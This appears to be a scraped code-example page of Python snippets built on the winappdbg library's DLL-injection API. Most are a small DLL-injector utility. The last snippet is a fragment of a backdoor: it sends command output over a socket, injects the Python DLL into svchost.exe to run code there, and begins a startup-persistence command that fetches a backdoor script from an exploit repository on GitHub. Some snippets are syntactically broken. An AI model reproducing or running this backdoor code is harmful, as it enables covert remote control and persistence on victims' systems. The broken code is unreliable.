def load_dll( pid, filename ):

    # Instance a Process object.
    process = Process( pid )

    # Load the DLL library in the process.
    process.inject_dll( filename )
Beispiel #2
0
def load_dll(pid, filename):

    # Instance a Process object.
    process = Process(pid)

    # Load the DLL library in the process.
    process.inject_dll(filename)
Beispiel #3
0
def main():
    print "Process DLL injector"
    print "by Mario Vilas (mvilas at gmail.com)"
    print

    if len(sys.argv) != 3:
        script = os.path.basename(sys.argv[0])
        print "Injects a DLL into a running process."
        print "  %s <pid> <library.dll>" % script
        print "  %s <process.exe> <library.dll>" % script
        return

    System.request_debug_privileges()

    try:
        pid = HexInput.integer(sys.argv[1])
    except Exception:
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print "Process not found: %s" % sys.argv[1]
            return
        if len(pl) > 1:
            print "Multiple processes found for %s" % sys.argv[1]
            for p,n in pl:
                print "\t%12d: %s" % (p,n)
            return
        pid = pl[0][0].get_pid()
    print "Using PID %d (0x%x)" % (pid, pid)

    dll = sys.argv[2]
    print "Using DLL %s" % dll

    p = Process(pid)
    b = p.get_bits()
    if b != System.bits:
        print (
            "Cannot inject into a %d bit process from a %d bit Python VM!"
            % (b, System.bits)
        )
        return
    p.scan_modules()
    p.inject_dll(dll)
Beispiel #4
0
def main():
    print("Process DLL injector")
    print("by Mario Vilas (mvilas at gmail.com)")
    print

    if len(sys.argv) != 3:
        script = os.path.basename(sys.argv[0])
        print("Injects a DLL into a running process.")
        print("  %s <pid> <library.dll>" % script)
        print("  %s <process.exe> <library.dll>" % script)
        return

    System.request_debug_privileges()

    try:
        pid = HexInput.integer(sys.argv[1])
    except Exception:
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print("Process not found: %s" % sys.argv[1])
            return
        if len(pl) > 1:
            print("Multiple processes found for %s" % sys.argv[1])
            for p,n in pl:
                print("\t%12d: %s" % (p,n))
            return
        pid = pl[0][0].get_pid()
    print("Using PID %d (0x%x)" % (pid, pid))

    dll = sys.argv[2]
    print("Using DLL %s" % dll)

    p = Process(pid)
    b = p.get_bits()
    if b != System.bits:
        print(()
            "Cannot inject into a %d bit process from a %d bit Python VM!"
            % (b, System.bits)
        )
        return
    p.scan_modules()
    p.inject_dll(dll)
Beispiel #5
0
def load_dll(pid, filename):
    process = Process(pid)
    process.inject_dll(filename)
Beispiel #6
0
			if dados.startswith("pwd"):
				s.send("\n"+str(os.getcwd)+"\n")
			if os.name == 'nt':
				try:
					# Injetando codigo
					python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor)
					python_dll = ctypes.util.find_library(python_lib)
    					s = System()
    					s.scan_processes()
    					pl = s.find_processes_by_filename("svchost.exe")
    					pid = pl[0][0].get_pid()
    					p = Process(pid)
    					print('pid', pid)
    					print('arch', p.get_bits())
    					t = p.inject_dll(python_dll)
    					p.scan_modules()
    					m = p.get_module_by_name(python_lib)
    					init = m.resolve("Py_InitializeEx")
    					pyrun = m.resolve("PyRun_SimpleString")
    					print(init, pyrun)
    					p.start_thread(init, 0)
    					time.sleep(0.1)
    					sh = 'import subprocess; subprocess.call("svchost.exe")'
    					addr = p.malloc(len(sh))
    					p.write(addr, sh)
					p.start_thread(pyrun, addr)

					# Movendo o backdoor pro startup
					if dados.startswith("move_startup"):
						url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"